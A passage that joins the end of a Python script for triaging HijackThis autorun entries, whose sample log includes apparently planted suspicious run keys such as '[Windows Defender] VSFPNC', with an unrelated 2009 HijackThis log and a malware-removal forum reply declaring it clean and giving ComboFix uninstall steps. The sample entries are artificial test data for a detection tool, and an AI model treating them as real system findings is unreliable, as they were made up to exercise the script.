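SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [atchk] "C:\Arquivos de programas\Intel\AMT\atchk.exe"
O4 - HKLM\..\Run: [soundMAXPnP] C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [Windows Defender] VSFPNC
O4 - HKLM\..\Run: [avast!] C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [Windows Update SP8] C:\WINDOWS\system32\Windows UpdateSP8.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Arquivos de programas\Arquivos comuns\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"[{f.entry.hive}] {f.entry.name}: " + "; ".join(f.reasons))
```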

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 08:37:20, on 16/11/2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)

Boot mode: Normal

 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

C:\WINDOWS\Explorer.EXE

C:\Arquivos de programas\Intel\AMT\atchk.exe

C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe

C:\Arquivos de programas\Java\jre6\bin\jusched.exe

C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

C:\WINDOWS\system32\hkcmd.exe

C:\WINDOWS\system32\igfxpers.exe

C:\WINDOWS\system32\spoolsv.exe

C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

C:\WINDOWS\system32\igfxsrvc.exe

C:\Arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe

C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe

C:\Arquivos de programas\Skype\Phone\Skype.exe

C:\Arquivos de programas\Messenger\msmsgs.exe

C:\Arquivos de programas\Intel\AMT\atchksrv.exe

C:\Arquivos de programas\Java\jre6\bin\jqs.exe

C:\Arquivos de programas\Intel\AMT\LMS.exe

C:\Arquivos de programas\Intel\AMT\UNS.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

C:\Hijack\HiJackThis.exe

 

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Arquivos de programas\Arquivos comuns\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)

O2 - BHO: Auxiliar de Conexão do Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de programas\Java\jre6\bin\jp2ssv.dll

O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Arquivos de programas\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll

O4 - HKLM\..\Run: [atchk] "C:\Arquivos de programas\Intel\AMT\atchk.exe"

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [RemoteControl] "C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Arquivos de programas\Java\jre6\bin\jusched.exe"

O4 - HKLM\..\Run: [soundMAXPnP] C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe

O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe

O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe

O4 - HKLM\..\Run: [avast!] C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe"

O4 - HKLM\..\Run: [Adobe ARM] "C:\Arquivos de programas\Arquivos comuns\Adobe\ARM\1.0\AdobeARM.exe"

O4 - HKCU\..\Run: [MsnMsgr] "C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [skype] "C:\Arquivos de programas\Skype\Phone\Skype.exe" /nosplash /minimized

O4 - HKCU\..\Run: [MSMSGS] "C:\Arquivos de programas\Messenger\msmsgs.exe" /background

O4 - HKUS\S-1-5-21-2052111302-1659004503-839522115-1004\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'postgres')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')

O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\ARQUIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: Pesquisar - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARQUIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de programas\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de programas\Messenger\msmsgs.exe

O14 - IERESET.INF: SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1235056171250

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}: NameServer = 150.163.28.5,150.163.105.9

O17 - HKLM\System\CS1\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}: NameServer = 150.163.28.5,150.163.105.9

O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

O23 - Service: Intel® Active Management Technology System Status Service (atchksrv) - Intel Corporation - C:\Arquivos de programas\Intel\AMT\atchksrv.exe

O23 - Service: avast! Antivirus - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

O23 - Service: avast! Web Scanner - ALWIL Software - C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Arquivos de programas\Java\jre6\bin\jqs.exe

O23 - Service: Intel® Active Management Technology Local Management Service (LMS) - Intel - C:\Arquivos de programas\Intel\AMT\LMS.exe

O23 - Service: PostgreSQL Database Server 8.3 (pgsql-8.3) - PostgreSQL Global Development Group - C:\Arquivos de programas\PostgreSQL\8.3\bin\pg_ctl.exe

O23 - Service: Intel® Active Management Technology User Notification Service (UNS) - Intel - C:\Arquivos de programas\Intel\AMT\UNS.exe

 

--

End of file - 6809 bytes


The log is clean.

*Click [Start] > [Run] > type: combofix /uninstall

*Click [OK]

*Click [Run]

*The message "ComboFix has been uninstalled" will appear

*Click [OK]

*Delete the file C:\combofix.txt


PROBLEM SOLVED!

If the author needs the topic reopened, just send a Private Message to a Moderator with a link to the topic.
